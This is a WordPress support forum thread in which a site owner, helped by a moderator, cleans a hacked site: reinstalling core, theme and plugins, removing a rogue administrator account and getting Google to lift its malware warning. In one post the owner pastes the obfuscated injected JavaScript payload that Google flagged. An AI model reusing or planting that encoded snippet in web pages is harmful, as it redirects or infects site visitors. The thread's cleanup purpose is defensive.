WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Google restricting site (23 posts)

  1. otronics
    Member
    Posted 2 years ago #

    Hi All,
    I’ve arrived at WP support forums as I’m stumped for a solution to this ongoing malicious problem.
    My site http://www.daysarenumbers.net/wordpress/

    Is restricted to be viewed by Google Chrome, believing that the site is harmful to computers.
    If I click proceed to site, I am presented with this
    Warning: require(/home/anenij/daysarenumbers.net/wordpress/wp-includes/l10n.php) [function.require]: failed to open stream: No such file or directory in/home/anenij/daysarenumbers.net/wordpress/wp-settings.php on line 103

    Fatal error: require() [function.require]: Failed opening required '/home/anenij/daysarenumbers.net/wordpress/wp-includes/l10n.php' (include_path='.:/usr/local/lib/php:/usr/local/php5/lib/pear') in /home/anenij/daysarenumbers.net/wordpress/wp-settings.php on line 103

    It is also worth noting that a week ago – my site was being redirected to a very spammy site.

    My Host, have said that some of my site contained malicious files that needed to be removed. They claimed that have run several scans and removed suspicious files.

    Now, here I am, not knowing what to do next to get my site back online and running?

    Help/advice I appreciate greatly.

    Oliver

  2. riversatile
    Member
    Posted 2 years ago #

    Hi,

    This is what I got :

    Warning: require(/home/anenij/daysarenumbers.net/wordpress/wp-includes/l10n.php) [function.require]: failed to open stream: No such file or directory in /home/anenij/daysarenumbers.net/wordpress/wp-settings.php on line 103
    
    Fatal error: require() [function.require]: Failed opening required '/home/anenij/daysarenumbers.net/wordpress/wp-includes/l10n.php' (include_path='.:/usr/local/lib/php:/usr/local/php5/lib/pear') in /home/anenij/daysarenumbers.net/wordpress/wp-settings.php on line 103

    First : You should check the integrity of your wp-config.php file and htaccess file.
    Second : Try to change your WordPress theme.
    Third : Upload/overwrite a fresh release of WordPress.

  3. otronics
    Member
    Posted 2 years ago #

    Thanks for your reply.

    1. I'll check those out in a few hours.
    2. How do I change the wordpress theme when I cannot get to the /login.php address?

    Thanks again

  4. esmi
    Forum Moderator
    Posted 2 years ago #

    Try:
    - switching to the Twenty Eleven theme by renaming your current theme's folder inside wp-content/themes and adding "-old" to the end of the folder name using FTP or whatever file management application your host provides.

    - resetting the plugins folder by FTP or phpMyAdmin.

    - re-uploading all files & folders - except the wp-content folder - from a fresh download of WordPress.

  5. riversatile
    Member
    Posted 2 years ago #

    Thanks esmi for clarification of what otronics need to do ;)

  6. otronics
    Member
    Posted 2 years ago #

    Thank you kindly - I'll be trying this out asap

  7. otronics
    Member
    Posted 2 years ago #

    Q. Will this damage my existing pages/posts/comments - ?

    for instance, if I switch back to Twenty Eleven, then move back to my current theme will all my original work be lost?

  8. esmi
    Forum Moderator
    Posted 2 years ago #

    Nope. Your content is all quite safe in your database.

  9. otronics
    Member
    Posted 2 years ago #

    UPDATE

    as esmi suggested. I reset the plugin folder using phpMyAdmin.

    I then downloaded the latest version of WordPress, then moved the files over to site/wordpress using cyberduck FTP, overwriting existing ones, except for the Content folder and wp-config.php

    I'm now stumped as to what next?

    I can visit http://www.daysarenumbers.net/wordpress

    But the page is blank!

    I'm obviously forgetting something, a little help would be great.

    Many Thanks

  10. esmi
    Forum Moderator
    Posted 2 years ago #

    Erm... I'm getting a malware warning at that url.

  11. otronics
    Member
    Posted 2 years ago #

    OH - yes, my browser is displaying a warning - but if I push past and proceed, the screen goes blank.

    I've noticed I can get to http://www.daysarenumbers.net/wordpress/wp-login.php

    but my credentials do not work.

  12. esmi
    Forum Moderator
    Posted 2 years ago #

  13. otronics
    Member
    Posted 2 years ago #

    Oh no, I really don't like this

  14. otronics
    Member
    Posted 2 years ago #

    Okay esmi thanks again!

    I believe I've made some progress - after removing everything off the server - and getting a fresh download of my theme I believe everything is back to normal.

    I have two further questions;

    1. Why are my browsers still saying 'this site is infect' ?
    2. A portion of my site is not displaying content as it should. Is this to do with the disabled plugins? Can I just go back to phpMyAdmin and revert back to original values?

    Thank you

  15. esmi
    Forum Moderator
    Posted 2 years ago #

    1. You need to ask Google to review your site via Google's Webmaster Tools

    2. I'd suggest upgrading WordPress first whilst your plugins are inactive.

  16. otronics
    Member
    Posted 2 years ago #

    Great - I've just asked Google to Review the site, but they want me to check that this suspicious code has been removed.

    The problem is that they give no indication as to where it's found!

    Does anyone have an idea?

    <script type='text/javascript'>st="dark-en0no3mno3niapno3rxr
    pno3rxen0d";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!
    %0|%f~%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!$^@$|&:&&$?$]
    ^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:
    $:!@!?^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+
    *+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:^@&*&+^]&_&*!!$|++&<!+&*$?
    &^$_&!&*!+*+&:&]&*$?$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:
    &*^]&!^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!
    $?$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!
    $?$@$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$
    &*!|&)&<&^&*$?$~&*&_^|$~&!$)$$&!$$$_!$&*!|&)&<&^&*$?$~&_&~
    ^^$~&!$)$$&*$$$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$@
    $$$~!+&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+
    &~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$_&:&_&+
    &*!?+~&&$?$$&&&:!$&*&&&~!?$$$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:
    &~&_$?$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_
    $?$:!@!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$
    $|&&
  17. esmi
    Forum Moderator
    Posted 2 years ago #

    I'm sorry but there's no easy way to do this. You have to start looking through all of your files in the wp-content folder. You did replace all WordPress core, theme & plugin files, yes?

  18. otronics
    Member
    Posted 2 years ago #

    Oh NO! The only thing I changed inside the wp-content folder was the theme -

    I'm removing the plugin files now.

    Thanks

  19. otronics
    Member
    Posted 2 years ago #

    Does 'updating' the plugin files to new versions count as removing them?

    ie. rewriting over the malicious ware?

  20. esmi
    Forum Moderator
    Posted 2 years ago #

    For safety's sake, I strongly recommend that you replace all plugins with new copies.

  21. otronics
    Member
    Posted 2 years ago #

    OH MY - I've just discovered that a new Administrator user was created !!

    quickly deleted & updated passwords to something more secure.

    I can't believe it!

    I'm finding this very useful - http://forums.avg.com/gb-en/avg-forums?sec=thread&act=show&id=204769&page=7&type=0

  22. otronics
    Member
    Posted 2 years ago #

    Just want to say thanks to esmi. The site is fixed and Google have approved it!

    :-)

  23. esmi
    Forum Moderator
    Posted 2 years ago #

    Wohoo! Glad to hear that it's all sorted. :-)

Topic Closed

This topic has been closed to new replies.

About this Topic